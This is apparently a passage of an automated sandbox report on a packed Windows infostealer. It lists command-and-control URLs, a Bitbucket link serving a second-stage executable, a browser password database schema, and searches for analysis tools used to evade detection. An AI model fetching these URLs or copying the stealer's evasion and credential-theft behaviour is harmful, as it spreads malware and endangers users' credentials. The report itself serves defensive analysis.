              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
              Source: BJQizQ6sqT.exe, 00000000.00000002.2543339826.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2541077126.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469446904.000000000105A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.000000000105C000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
              Source: BJQizQ6sqT.exe, 00000000.00000002.2540495872.0000000000E6A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469446904.000000000105A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.000000000105C000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeoSs
              Source: BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exex
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368445147.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2314997008.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2541077126.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368602207.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2236263252.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2236423205.00000000058DB000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2239087852.00000000058DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236263252.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2236423205.00000000058DB000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2239087852.00000000058DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiime
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apil
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apirepo=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiz6d2aulIgapAATu2Q4g14DFmyGQ/HKq
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368445147.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368602207.0000000001073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pih
              Source: BJQizQ6sqT.exe, 00000000.00000003.2314997008.0000000001073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/s
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2264300318.000000000107A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BJQizQ6sqT.exe, 00000000.00000002.2543339826.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266049972.00000000059DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266049972.00000000059DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.29.90:443 -> 192.168.2.6:49776 version: TLS 1.2

              System Summary

              barindex
              Source: BJQizQ6sqT.exeStatic PE information: section name:
              Source: BJQizQ6sqT.exeStatic PE information: section name: .rsrc
              Source: BJQizQ6sqT.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_00FE90500_3_00FE9050
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_00FEE8AE0_3_00FEE8AE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
              Source: BJQizQ6sqT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: BJQizQ6sqT.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4140
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f02c9ff4-7532-42dd-81f9-e87baf15220eJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212610470.0000000005905000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2237508619.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2213013718.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2237963624.0000000005988000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BJQizQ6sqT.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile read: C:\Users\user\Desktop\BJQizQ6sqT.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\BJQizQ6sqT.exe "C:\Users\user\Desktop\BJQizQ6sqT.exe"
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: BJQizQ6sqT.exeStatic file information: File size 2916352 > 1048576
              Source: BJQizQ6sqT.exeStatic PE information: Raw size of qxtptbyt is bigger than: 0x100000 < 0x2a0000

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeUnpacked PE file: 0.2.BJQizQ6sqT.exe.a30000.0.unpack :EW;.rsrc :W;.idata :W;qxtptbyt:EW;fodmgcsz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;qxtptbyt:EW;fodmgcsz:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: BJQizQ6sqT.exeStatic PE information: real checksum: 0x2cf12c should be: 0x2d3cd2
              Source: BJQizQ6sqT.exeStatic PE information: section name:
              Source: BJQizQ6sqT.exeStatic PE information: section name: .rsrc
              Source: BJQizQ6sqT.exeStatic PE information: section name: .idata
              Source: BJQizQ6sqT.exeStatic PE information: section name: qxtptbyt
              Source: BJQizQ6sqT.exeStatic PE information: section name: fodmgcsz
              Source: BJQizQ6sqT.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_01073CE5 push cs; retf 0006h0_3_01073CEA
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeCode function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: BJQizQ6sqT.exeStatic PE information: section name: entropy: 7.976841630322983

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
